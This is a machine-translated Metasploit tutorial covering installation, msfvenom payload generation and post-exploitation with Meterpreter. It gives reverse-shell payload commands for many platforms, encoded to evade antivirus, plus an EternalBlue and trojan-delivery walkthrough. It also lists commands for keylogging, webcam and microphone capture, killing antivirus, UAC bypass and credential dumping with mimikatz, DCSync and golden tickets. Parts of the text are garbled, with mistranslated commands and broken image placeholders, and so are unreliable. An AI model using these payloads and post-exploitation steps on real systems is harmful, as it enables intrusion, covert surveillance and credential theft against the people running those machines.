Detailed explanation of MSF usage
- 01 History of MSF Development
- 02 Linux installation MS
- 03 kali update msf
- 04 Windows installation MSF courseware
- 05 MSF GUI Viper
- 06 MSF directory structure
- 07Metasploit's core module
- 08-09 Common parameters of msfvenom (updated)
- 10-11 msfconsole exploit process
- 12 introduction to meterpreter
- 13 PHP Backdoor Bounce Connection Demonstration Document
- 14 Accessing the file system after penetration
- 15 Upload and download files after infiltration
- 16 Screenshots of post-infiltration
- 17 Keylogging after infiltration
- 18 Create account after infiltration (Windows)
- 19 Post-Infiltration: Calling Audio Equipment for Recording
- Post-20s Escalation of Infiltration
- 21 Obtaining login password after infiltration (Windows)
- 22 Post-infiltration remote monitoring (Windows)
- 23 Post-infiltration call camera
01 History of MSF Development
1 Metasploit-History of Development
The Metasploit framework makes Metasploit have good scalability. Its control interface is responsible for discovering vulnerabilities, attacking vulnerabilities, submitting vulnerabilities, and then adding post-attack processing tools and reporting tools through some interfaces. The Metasploit framework can import data from a vulnerability scanner, use detailed information about vulnerable hosts to discover exploitable vulnerabilities, and then launch an attack on the system with a payload that develops a viable attack method after the vulnerability is discovered. It's a module for extracting local system passwords, installing other software, or controlling hardware, much like what tools like BO2K used to do.
year 2004
In August 2004, a world hacker exchange meeting was held in Las Vegas - called Black Hat Briefings (Black Hat Briefings). In the limelight. Metasploit was developed by four young people including HD Moore and Spoonm. This free software can help hackers attack and control computers. Security personnel can also use Metasploit to strengthen the system against such tools. Demonstrations of Metasploit attracted numerous security consultants and individuals from government agencies such as the "DoD" and the "National Security Agency." As Spoonm said in his presentation, Metasploit is simple and requires only "find the target, click and control". The release of Metasploit in 2004 caused a strong "earthquake" in the security world.
2005
In June 2005, a "blue hat" meeting was held in the management intelligence center of the Microsoft headquarters in the Seattle area. Hundreds of Microsoft engineers and numerous outside experts and hackers were invited into the heart of Microsoft's empire. During a hacking demo at the conference, Metasploit rattled Microsoft developers again when Moore explained to system programmers how reliable Metasploit was to test systems against intrusions. From the perspective of programmers, Metasploit will make the system security face a serious test. Released as open source in 2003, Metasploit (MSF) is a freely available development framework. It is a powerful open source platform that provides development, testing and use of malicious code. This environment provides a reliable platform for penetration testing, shellcode writing and vulnerability research. The Metasploit framework was written in the Perl scripting language until version 2.7 released in 2006. Due to some defects in Perl, the developers rewrote the framework in Ruby language at the end of 2007. By late 2007, Spoonm and Matt Miller had left the project. Starting with version 3.2, released in 2008, the project is licensed under the new 3-part BSD license.
Year 2009
On October 21, 2009, the vulnerability management solution company Rapid7 acquired the Metasploit project. Rapid7 has committed to a dedicated development team and still places the source code under a 3-part BSD license.
2BSD License
Compared with the strictness of the GPL license and the MPL license, the BSD license is much more relaxed. It also only needs to attach the original text of the license, but what is more interesting is that it also requires all further developers to transfer their copyrights. Put the information on it, so you may encounter a small situation when you get the software released under the BSD license, that is, the space occupied by these copyright material licenses is larger than the program.
3 Metasploit Development Prospects
02 Linux installation MS
1 Install MSF on Ubuntu
Environment preparation:
vm virtual machine
Ubuntu Desktop Mirroring
Open the terminal and enter sudo su to get root privileges
Then enter the command
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Then grant 755 permissions and execute the installation
chmod 755 msfinstall && ./msfinstall
2 Install kali system directly
The first vm virtual machine kali
The second iso installation image
First, let's go to kali official website to download kali
https://www.kali.org/get-kali/#kali-bare-metal Select the installation version mirror
03 kali update msf
login kali
1 Open the terminal to obtain root privileges
获取root权限 可以在终端 输入 sudo su 然后输入登录密码获取root权限
2 start update
First add the update source
Enter the etc/apt/ directory
Opening sources.list needs to be executed with root privileges
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#Alibaba cloud kali update source
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#163 DEBIAN SOURCE
deb http://mirrors.163.com/debian wheezy main non-free contrib
deb-src http://mirrors.163.com/debian wheezy main non-free contrib deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib
apt-get update
apt-get install metasploit-framework
3 If the update error is displayed when updating!
Enter the following commands to fix
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add
apt-get clean
apt-get update
4 如果报:
E: Unmet dependencies. Try ‘apt --fix-broken install’ with no packages (or specify a solution).
apt --fix-broken install
04 Windows installation MSF courseware
1 download metasploit
First, let's enter the metasploit official website
Click Download to download
Or visit this address directly
https://www.metasploit.com/download
Enter this page and click Download under Metasploit Framework
will visit this address
https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
If you can't open GitHub we can visit https://hub.fastgit.org/rapid7/metasploit-framework/wiki/Nightly-Installers via mirror server
Here to provide you with more domestic available images
#Official website image (can be used to clone push, etc., but cannot log in)
https://github.com.cnpmjs.org/
https://git.sdut.me/
#github Commonly used mirrors
https://hub.fastgit.org
https://git.sdut.me/
http://github-mirror.bugkiller.org/
#api mirror
https://api.git.sdut.me/
Then find the download for the Windows version
Click latest Windows installer to download the latest version
Click view older builds to download historical versions
2 Install metasploit and configure environment variables
Turn off the anti-virus that comes with win and uninstall the third-party anti-virus before installation
Add environment variables
C:\metasploit-framework\bin
3 Start and use
The first startup needs to initialize the database
Enter msfdb init in the terminal
Start the MSF framework
Enter msfconsole in the terminal
05 MSF GUI Viper
MSF graphical interface Viper (colorful snake) download and use
Viper is a graphical intranet penetration tool that modularizes and weaponizes commonly used tactics and techniques in the intranet penetration process.
Integrated antivirus bypass, intranet tunnel, file management, command line and other basic functions.
At present, 70+ modules have been integrated, covering major categories such as initial access/persistence/privilege escalation/defense bypass/credential access/information collection/lateral movement.
Install Docker on Kali Linux
apt-get update
# Install docker using apt
apt-get install -y docker.io
#Set boot systemctl start docker
#Check startup status docker version
Install docker-compose
curl -L https://get.daocloud.io/docker/compose/releases/download/1.25.5/docker-compose-uname -s-uname -m > /usr/bin/docker-compose
#Give executable status chmod +x /usr/bin/docker-compose
#Set the installation directory
export VIPER_DIR=/root/VIPER
# Execute the following naming to generate the installation directory and enter the installation directory
mkdir -p $VIPER_DIR && cd $VIPER_DIR
Execute the following command to generate docker-compose.yml
If the command you see is messed up https://note.youdao.com/s/GdzSJnWD see this document
tee docker-compose.yml <<-‘EOF’ version: “3” services: viper: image: registry.cn-shenzhen.aliyuncs.com/toys/viper:latest container_name: viper-c network_mode: “host” restart: always volumes: - ${PWD}/loot:/root/.msf4/loot - ${PWD}/db:/root/viper/Docker/db - ${PWD}/module:/root/viper/Docker/module - ${PWD}/log:/root/viper/Docker/log - ${PWD}/nginxconfig:/root/viper/Docker/nginxconfig command: [“VIPER_PASSWORD”] EOF
Setting login password
Viper does not allow the use of default passwords, replace diypassword with custom passwords
export VIPER_PASSWORD=Enter your password
Write password to docker-compose.yml
sed -i “s/VIPER_PASSWORD/$VIPER_PASSWORD/g” docker-compose.yml
#Use the command to view the configuration
cat docker-compose.yml
Create and start Viper
cd $VIPER_DIR docker-compose up -d
start viper
docker-compose start
Wait for 15s for the system to start, visit
- https://ip:60000
- Login. Username: root Password: custom password
Enter ip a in the terminal to view the local ip
- My IP is 192.168.3.31 Then I visit https://192.168.3.31:60000 in the browser, the login name is root and the password is the root I set above
For example: My ip is 192.168.3.31, then the IP to access the colorful snake is 192.168.3.31:60000
Notice:
All docker-compose commands must be executed in the installation directory to have any effect
06 MSF directory structure
Kali terminal middle input
/usr/share/metasploit-framework
Then enter ls to view
Some modules to remember
modules: The directory stores the auxiliary modules used for infiltration. The encoding module uses the module to attack the payload and then infiltrates the module.
plugins: This module needs to be loaded with load, mainly providing database connection plug-ins and various plug-ins to be used.
tools: Contains some useful scripts and scattered tools.
scripts: The scripts used by meterpreter are stored in the directory.
db: the data is placed in this directory
data: Store used files, such as password dictionary, meterpreter, passivex, vnc, dlls and other tools and some user interface codes, data files used by msfweb and some other modules
lib: library files are stored in this directory
07Metasploit's core module
The modules of msf are placed in
/usr/share/metasploit-framework/modules/ under this directory
1 auxiliary: auxiliary module, auxiliary penetration (port scanning, login password blasting, vulnerability verification, etc.)
2 exploits: The exploit module contains mainstream exploit scripts, usually exploiting some targets that may have vulnerabilities.
3 payloads: attack load, mainly the code executed on the target machine after the attack is successful, such as the code of the reverse shell
4 post: post-infiltration stage module, after the exploit successfully obtains the meterpreter, some functions sent to the target
Instructions, such as: privilege escalation, etc.
5 encoders: The encoder module mainly includes various encoding tools to encode and encrypt the payload so as to bypass the intrusion detection and filtering system
6 evasion: Evasion module, used to generate anti-kill payload
7 nops: Here is mainly a tool to adjust the length of the nop instruction in front of the shellcode (it doesn’t matter if you don’t understand it)
msfvenom in Kali replaces msfpayload and msfencode, and is often used to generate backdoor Trojans
msfpayload is an MSF attack payload generator used to generate shellcode and executable code.
msfencode is the MSF encoder.
08-09 Common parameters of msfvenom (updated)
1. Common parameters of msfvenom
-l
lists all available resources of the specified module, module types include: payloads, encoders, nops, all
-p
specifies the payload (attack load) to be used.
-f
specifies the output format
Executable formats:Asp、aspx、aspx-exe、axis2、dll、elf、elf-so、exe、exe-only、exe-service、exe-smallhta-psh、jar、jsp、loop-vbs、macho、msi、msi-nouac、osx-app、psh、psh-cmd、psh-net、psh-reflection、python-reflection、vba、vba-exe、vba-psh、vbs、war;
Transform formats:base32、base64、bash、c、csharp、dw、dword、hex、java、js_be、js_le、num、perl、pl、powershell、ps1、py、python、raw、rb、ruby、sh、vbapplication、vbscript;
-e
specifies the encoder (encoder) encoding to be used to avoid killing.
-a
specifies the target architecture of the payload
Select Architecture Platform: x86 | x64 | x86_64
Platforms: windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript , python, nodejs, firefox, mainframe
-o
save payload file output.
-b
set the character set to avoid, for example: '\x00\xff' characters to avoid
-n
pre-specifies a NOP slide length for the payload
-s
sets the maximum length of the effective attack load The maximum length of the generated payload is the file size.
-i
specifies the number of encodings of the payload
-c
specifies an additional win32 shellcode file
-x
specifies a custom executable file as a template
. For example: there is a normal file normal.exe, you can use this option to bind the backdoor to this program.
-k
protects the action of the template program, and the injected payload runs as a new process
. For example: there is a normal file normal.exe, and this option can be used to bind the backdoor to this program.
-v
specifies a custom variable to determine the output format
2. Each platform generates the payload command
Windows
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.33 LPORT=4444 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 10 -f exe -o payload.exe
Mac
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.33 LPORT=4444 -f macho -o payload.macho
Android
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -o payload.apk
Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
Linux
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f elf -o payload.elf
php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f raw > shell.php
aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f aspx -o payload.aspx
JSP
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.jsp
war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw - o payload.war
nodejs
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.js
python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.py
perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.pl
ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.rb
lua
msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.lua
windows shellcode
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c
linux shellcode
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c
mac shellcode
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c
10-11 msfconsole exploit process
1. Stage division:
Vulnerability exploitation is divided into the stages of early interactive intelligence collection, threat modeling, vulnerability analysis, and post-exploitation report.
1. Early stage of interaction:
Interactive discussions with client organizations to determine scope, goals, etc.
This stage can be understood as the stage before intelligence collection, mainly to find the target confirmation range
[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-pFAfZr8y-1666167673706) (10-11 msfconsole vulnerability exploitation process.assets/1643165117094.png)]
2. Information gathering stage:
For more information on target organizations,
| Peripheral Information Search - Google
[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-GWPRHdwP-1666167673707) (10-11 msfconsole vulnerability exploitation process.assets/1643165139006.png)]
Host detection and port scanning such as -Nmap
Service scanning Use the service scanning module in auxiliary/scanner/ in metasploit to scan the service version and other information in the target machine
Network vulnerability scanning - OpenVAS, Nessus, etc.
Other tools scan py script scan
3. Threat modeling phase:
Sort out the clues and determine the most feasible exploit channel. The documents written in this modeling stage are not for yourself but for the whole team to facilitate multi-person cooperation.
[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-vViQWSs2-1666167673707) (10-11 msfconsole vulnerability exploitation process.assets/1643165166875.png)]
This stage is mainly to sort out the collected information and clarify the idea of exploiting the vulnerability.
4. Vulnerability analysis stage:
Search for available exploit code resources
[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-CFjTB6YY-1666167673707) (10-11 msfconsole vulnerability exploitation process.assets/1643165182827.png)]
This stage mainly selects and matches possible exploit modules, shellcode
5. Penetration stage:
Find security holes, hack into the system
At this stage, try to exploit the vulnerability, configure monitoring, and start exploiting the vulnerability
6. Post-infiltration stage:
Meterpreter, implement operations
At this stage, the implementation of relevant data download backdoor maintenance and privilege escalation and other operations
7. Reporting stage:
Vulnerability Exploitation Penetration Test Report (see Penetration Test Report Course for detailed report writing)
[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-qvh0t4qD-1666167673707) (10-11 msfconsole vulnerability exploitation process.assets/1643165204135.png)]
| This stage is mainly to summarize the penetration. The overview generally includes time, personnel, scope of vulnerability exploitation, technical means and so on. In this part, we need to determine the time frame for exploiting the exploit, the personnel and contact information involved in exploiting the exploit, the agreed scope of exploiting the exploit, and descriptions of techniques and tools used in the exploiting process. Write down the pre-interactive intelligence collection threat modeling vulnerability analysis. Penetration and exploitation results of penetration and exploitation of vulnerabilities, security recommendations, etc.
In the process of writing, special attention should be paid to: the description of the vulnerability should not be too simple, and it should be mentioned in one stroke; in the security suggestion section, avoid putting forward security suggestions that have no practical significance, such as strengthening security awareness; the report structure is chaotic, and there are too many complicated technical terms , such as around the dog, x station, etc.;
2. Actual operation (example)
Host range and target identified
1 Intelligence gathering
Discover surviving hosts on the intranet based on msf
search search
Enter search scanner type:auxiliary in the msf terminal
Modules that can be used to discover hosts
auxiliary/scanner/discovery/arp_sweep # Discover surviving hosts on the intranet based on ARP
auxiliary/scanner/discovery/udp_sweep # Discover surviving hosts on the intranet based on UDP
auxiliary/scanner/ftp/ftp_version # Discover FTP service
auxiliary/scanner/http/http_version # Discover HTTP service
auxiliary/scanner/smb/smb_version # Discover surviving hosts in the intranet based on smb
Discover surviving hosts on the intranet based on netbios
Discover surviving hosts on the intranet based on snmap
Discover surviving hosts on the intranet based on ICMP
2 Threat Modeling
After the first step of intelligence collection, we discovered the target machine ip through arp
Then, by scanning the ip of the target machine, we know that the target machine has opened port 80, has web services, and has opened ftp ports, and has file services.
open smb
Finally decided to exploit smb-related vulnerabilities
The alternative is exploited by implanting a Trojan horse
3 Vulnerability Analysis
The first step is to check the smb exploit vulnerabilities, such as Eternal Blue
1 Query the modules related to msf and Eternal Blue
Use the command search ms17_010
2 Then we took advantage of an Eternal Blue scanning module
use auxiliary/scanner/smb/smb_ms17_010
3 Enter options to view the parameters that the scanning module needs to configure
3.1 Then we configured rhost (rhost refers to the target host ip)
ip roast set
4 Then we perform scan input run
Potentially vulnerable hosts discovered
4 Penetration
1 Load the EternalBlue exploit module
use exploit/windows/smb/ms17_010_eternalblue
2 Enter options to view the parameters that the scanning module needs to configure
3.1 Then we configured rhost (rhost refers to the target host ip)
ip roast set
3.2 Then we configured lhost (lhost refers to the monitoring host or attacking machine ip)
set lhost ip
3.3 Then we configured lport (referring to the monitored port)
set lport ip
Note that the port must not be occupied
4 Then we execute the scan input run to execute the eternal blue exploit
But found that the failure prompt module has been used but did not return the corresponding session
[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-ERkkSXqK-1666167673708) (10-11 msfconsole vulnerability exploitation process.assets/bffdb79061ad4b0aa92d2dfde83e9f1b.png)]
5 Alternatives are exploited by implanting Trojan horses
1 We know that the target machine is a win system, so use msfvenom to generate a win platform Trojan horse
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.3.33 LPORT=4446 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
2 After the vulnerability is generated, upload the Trojan to the target machine by starting a py service
python -m SimpleHTTPServer 80
3 To configure the monitoring program we use
use exploit/multi/handler
3 Enter options to enter the configuration
3.1 Then we configured lhost (lhost refers to the monitoring host or attacking machine ip)
set lhost ip
3.2 Then we configured lport (referring to the monitored port)
set lport ip
Note that the port must be the same as the Trojan port generated by msfvenom
4 Configure the attack load payload
set payload windows/meterpreter/reverse_tcp
5 Execute the exploit and wait for the target machine to execute the Trojan horse
6 The target machine executes the Trojan horse
exploit success and get meterpreter
5 Post-exploitation
go to new document
6 Reporting phases
12 introduction to meterpreter
1. What is Meterpreter
Meterpreter is a powerful tool in the Metasploit framework. It is used as an attack load after the vulnerability overflows. After the attack load triggers the vulnerability, it will return a channel controlled by us, which can be used to execute commands remotely! Metasploit provides Meterpreter versions for various mainstream platforms,
including Windows, Linux, and x86 and x64 platforms are supported at the same time. In addition, Meterpreter also provides implementations based on PHP and Java languages. Meterpreter's working mode is pure memory. The advantage is that it starts hidden and is difficult to be detected by anti-virus software. There is no need to access the target host disk, so there are no traces of intrusion. In addition to the above, Meterpreter also supports extensions in the form of Ruby scripts. So it is necessary to understand the Ruby language.
2. Commonly used rebound types in Meterpreter
1.reverse_tcp
This is a TCP-based reverse link rebound shell, which is very stable to use
3. Common commands of Meterpreter
1. Basic commands
help# View Meterpreter help
background#Return, suspend meterpreter background
bgkill#Kill a meterpreter script
bglist#Provide a list of all running background scripts
bgrun#Run script as a background thread channel
#Display active channel
sessions -i number #Interact with sessions, number indicates the nth session, use session -i to connect to the meterpreter session with the specified serial number and continue to use
sesssions -k number #Interact with the session
close# Close the channel
exit# Terminate the meterpreter session
quit# Terminate the meterpreter session
interact id #Switch into one Channel
run#Execute an existing module, what I want to say here is to enter run and press tab twice, all existing scripts will be listed, commonly used are autoroute, hashdump, arp_scanner, multi_meter_inject, etc. irb# Enter Ruby script
mode
read# Read data from the channel write# Write data to a channel
run and bgrun# After the foreground and background are executed, it selects the meterpreter script
use# Load the extension of meterpreter
load/use#Load module
Resource#Execute an existing rc script
2 Common commands
2.1 Some commands for Android phones
Get phone contacts: dump_contacts
Get SMS records: dump_sms
Control the experimental mobile phone to send text messages: send_sms -d 15330252525 -t
"hello"
Obtain the GPS positioning information of the experimental mobile phone: geolocate
Obtain the Wi-Fi location information of the experimental mobile phone: wlan_geolocate
Control experiment mobile phone recording: record_mic
-d 5
Get experimental phone camera devices: webcam_list
Control experiment mobile phone camera: webcam_snap
Live experiment mobile phone camera: webcam_stream
2.2 Some commands for Windows
View process: ps
View the current process number: getpid
View system information: sysinfo
Check whether the target machine is a virtual machine: run
post/windows/gather/checkvm
View complete network settings: route
View current permissions: getuid
Automatic privilege escalation: getsystem
Close the antivirus software: run post/windows/manage/killav
Start Remote Desktop Protocol: run post/windows/manage/enable_rdp
List currently logged on users: run post/windows/gather/enum_logged_on_users
View current applications: run post /windows/gather/enum_applications
Grab a screenshot of the target machine: load espia; screengrab
Get camera devices: webcam_list
Control camera: webcam_snap
Live webcam: webcam_stream
Control recording: record_mic
View the directory currently on the target machine: pwd
View the current directory: getlwd
Dump the current user password hash run hashdump
Username: SID: LM Hash: NTLM Hash:::
You can also use the following command to export higher authority run windows/gather/smart_hashdump
Grab the username and password for automatic login run windows/gather/credentials/windows_autologin
Obtain the plaintext password directly (note that this function needs to obtain the system permission to obtain the system permission, and you need to enter getsystem)
Preferred terminal input load kiwi to load kiwi
creds_all: Enumerate all credentials
creds_kerberos: Enumerate all kerberos credentials
creds_msv: Enumerate all msv credentials
creds_ssp: Enumerate all ssp credentials
creds_tspkg: Enumerate all tspkg credentials
creds_wdigest: Enumerate all wdigest credentials
dcsync: Retrieve user account information via DCSync
dcsync_ntlm: Retrieve user accounts via DCSync NTLM hashes, SIDs and RIDs
golden_ticket_create: Create golden tickets
kerberos_ticket_list: List kerberos tickets
kerberos_ticket_purge: Clear kerberos tickets
kerberos_ticket_use: Use kerberos tickets
kiwi_cmd: Execute mimikatz commands, followed by mimikatz.exe commands
lsa_dump_sam: Dump lsa SAM
lsats_dump_secret Dump out the ciphertext of lsa
password_change: change the password
wifi_list: list the current user's wifi configuration file
wifi_list_shared: list the shared wifi configuration file/encoding
3. File system commands
cat c:\boot.ini#Check the file content, the file must exist
del c:\boot.ini #Delete the specified file
upload /root/Desktop/netcat.exe c:\ #Upload the file to the target host, such as upload setup.exe C:\windows\system32
download nimeia.txt /root/Desktop/ # Download files to this machine, such as: download C:\boot.ini /root/ or download C:\“ProgramFiles”\Tencent\QQ\ Users\295**** 125\Msg2.0.db /root/
edit c:\boot.ini #Edit file
getlwd#Print local directory
getwd#Print working directory
lcd#Change local directory
ls#List in the current directory List of files
lpwd#Print local directory
pwd#Output working directory
cd c:\ #Enter directory file
rm file #Delete file
mkdir dier #Create directory on victim system
rmdir#Delete directory on victim system
dir#List File and folder information of the target host
mv#Modify the file name on the target host
search -dd:\www -f web.config #search file, such as search -dc:\ -f .doc
meterpreter > search -f autoexec.bat #search file
meterpreter > search -f sea .bat c:\xamp\
enumdesktops #user login number
13 PHP Backdoor Bounce Connection Demonstration Document
1. Environmental preparation
1 DVWA shooting range
DVWA download: https://codeload.github.com/ethicalhack3r/DVWA/zip/master
Note: Configure the DVWA environment to prepare PHP7.0 or above, and the Nginx environment
1 Configure the database password and configure the config/config.inc.php.dist file (note that the .dist of the backdoor should be deleted by renaming)
2 Use a browser to visit http:/ /XxIP/setup.php
3 Red text problem solved
4 Missing key Directly replace the following 2 sentences or visit https://www.google.com/recaptcha/admin/create
$_DVWA[ 'recaptcha_public_key' ] = '6LdJJlUUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb';
$_DVWA[ 'recaptcha_private_key' ] = '6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K';
5 allow_url_include: Disabled prompt is not enabled
Find php.ini allow_url_include in the php directory and change the following parameter OFF to On Restart Nginx to take effect after modification
2 Metasploit Any Platform
It can be the Windows version or the version that comes with Kali
2. Metasploit configuration monitoring and attack load
1 Configuration monitoring - using the handler module
use exploit/multi/handler
2 Configure the attack load and set the payload
The first step is to set the payload
set payload php/meterpreter/reverse_tcp
The second step is to set lhost and lport
set lhost xxxip ;
set lport xxx port;
3 Generate php backdoor execution attack to obtain meterpreter
Create a new terminal and enter in the terminal
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.3.23 lport=4456 R>shell.php
3.2 Propagation - simple web service using Python
python -m SimpleHTTPServer 80
will shell.php
3.3 Execute the attack to get meterpreter
run or exploit
Get the meterpreter and we can do the penetration operation
For example, to watch the screen, you can enter it in meterpreter
run vnc
To view the current account, you can enter it in meterpreter
testified
14 Accessing the file system after penetration
1. Access file system after penetration
1. File interaction command
| ID | Command | Description |
|---|---|---|
| 1 | cat | read file content |
| 2 | cd | Switch target directory |
| 3 | cp | copy files to target |
| 4 | mv | move to target |
| 5 | chmod | Modify file permissions (such as chmod 777 shell.elf) |
| 6 | del/rm | delete target file |
| 7 | dir | Print Target Catalog |
| 8 | mkdir | Create a directory on the target machine |
| 9 | is rm | Delete the target machine directory |
| 10 | edit | edit file |
| 11 | getlwd | print local directory |
| 12 | getwd | Print Target Catalog |
| 13 | lcd | change local directory |
| 14 | lls | list local directories |
| 15 | ls | List the target machine file directory |
| 16 | lpwd | print local directory |
| 17 | pwd | print working directory |
| 19 | search | Search file details search -h |
Linux permission understanding
chmod 777 {filename.suffix}
chmod 777 shell.elf
15 Upload and download files after infiltration
| ID | Command | Description |
|---|---|---|
| 1 | upload | Transfer files to target machine |
| 2 | download | Download files from target machine |
16 Screenshots of post-infiltration
| ID | Command | Description |
|---|---|---|
| 1 | screenshot | Screenshot (Windows) |
17 Keylogging after infiltration
| ID | Conmmand | Description |
|---|---|---|
| 1 | keyscan_start | Start Keylogger (Windows) |
| 2 | keyscan_dump | Export keyboard (Windows) |
| 3 | keyscan_stop | Stop keylogging (Windows) |
18 Create account after infiltration (Windows)
1. Environmental preparation
1 MSF-Metasploit Framework
2 A target machine that has obtained the meterpreter
2. Actual operation
1. First look at the target target machine already exists in the user meterpreter input: run post/windows/gather/enum_logged_on_users
2. Use getgui to create an account with the username msb and the password 123456
run getgui -u msb -p 123456
run getgui -u {username} -p {password}
Enter the operation of win and enter netplwiz to view the account creation status
[-] Insufficient privileges, account was not be created. When you see this prompt, you need to escalate the privilege first (acquired to the system)
2.1 Bypass UAC privilege escalation
use exploit/windows/local/ask
19 Post-Infiltration: Calling Audio Equipment for Recording
1. Environment preparation
MSF-Metasploit Framework
installs a mobile phone or simulator
2. Practice
record_mic contains 4 optional parameters which are
-d is to set the recording duration
-f set unseen paths
-h view help
-p controls autoplay
A simple recorded sentence
record_mic -d 10 -p true
Post-20s Escalation of Infiltration
1. Environmental preparation
1 MSF-Metasploit Framework
2 A windows target machine
Two, actual combat
1. Privilege escalation method (Windows) Check the currently obtained user’s permission. Enter in the meterpreter: getuid
Method 1. Input in meterpreter: getsystem
Method 2: Use the msf module to escalate privileges
If you want to raise the right, you must have got the meterpreter and then enter the current meterpreter background meterprerer into background
1. To view the available modules, enter search bypassuac in the MSF terminal to view the privilege escalation module
2. Select a privilege escalation module suitable for the current system. I am using the win10 system here.
Then we use: use exploit/windows/local/bypassuac_windows_store_reg to try to escalate privileges
If this module doesn’t work, change it to use exploit/windows/local/bypassuac_sluihijack
Or use exploit/windows/local/bypassuac_dotnet_profiler
3 Configure the module to use parameter input in the terminal: show options
4 You can see that the session needs to be configured. Enter in the terminal: set session {session id that needs to be elevated}
5 Execute the privilege escalation terminal and enter: run
6 After obtaining the meterpreter, we enter getuid in the terminal to see that the privilege has not been successfully escalated, and we need to enter getsystem in the terminal to obtain the privilege
7 After obtaining the authority, enter getuid to see that the highest authority of SYSTEM has been obtained
Seeing this proves that the privilege has been successfully elevated
21 Obtaining login password after infiltration (Windows)
1. Environmental preparation
1 MSF-Metasploit Framework
2 A windows target machine
Two, actual combat
First get a meterpreter with SYSTEM privileges
1 Grab the automatic login account password
2 Export the SAM database local account password file
3 Export password hashes
4 Use the kiwi module to obtain
1 Many people like to set automatic login on the computer. We can grab the account password for automatic login
run windows/gather/credentials/windows_autologin
If prompted, this proves that the machine is not configured for automatic login
2 You can also export the local user account in the SAM database (note that you need to escalate to SYSTEM)
run post/windows/gather/smart_hashdump
| username | SID | LM hash: | NTLM Hash 1::: |
|---|---|---|---|
| mb | 1000 | aad3b435b51404eeaad3b435b51404ee | 32ed87bdb5fdc5e9cba88547376818d4 |
3 Use hashdump to get the password (note that you need to escalate to SYSTEM to use it)
Enter run hashdump in the terminal
Use the online analysis tool https://www.cmd5.com/
NTLM hash example: 32ed87bdb5fdc5e9cba88547376818d4
4 Use load kiwi (the system permission is required to use the kiwi module)
The kiwi_cmd module allows us to use all the functions of mimikatz, and the commands of mimikatz can be used directly in kiwi_cmd
5.1 Terminal input load kiwi
5.2 creds_all get password directly
5.3 Use kiwi_cmd sekurlsa::logonpasswords to get the password
| ID | kiwi parameters and description |
|---|---|
| 1 | creds_all: List all credentials |
| 2 | creds_kerberos: List all kerberos credentials |
| 3 | creds_msv: List all msv credentials |
| 4 | creds_ssp: List all ssp credentials |
| 5 | creds_tspkg: List all tspkg credentials |
| 6 | creds_wdigest: List all wdigest credentials |
| 7 | dcsync: Retrieve user account information via DCSync |
| 8 | dcsync_ntlm: Retrieve user account NTLM hash, SID and RID via DCSync |
| 9 | golden_ticket_create: create a golden ticket |
| 10 | kerberos_ticket_list: list kerberos tickets |
| 11 | kerberos_ticket_purge:清除kerberos票据 |
| 12 | kerberos_ticket_use:使用kerberos票据 |
| 13 | kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令 |
| 14 | lsa_dump_sam:dump出lsa的SAM |
| 15 | lsa_dump_secrets:dump出lsa的密文 |
| 16 | password_change:修改密码 |
| 17 | wifi_list:列出当前用户的wifi配置文件 |
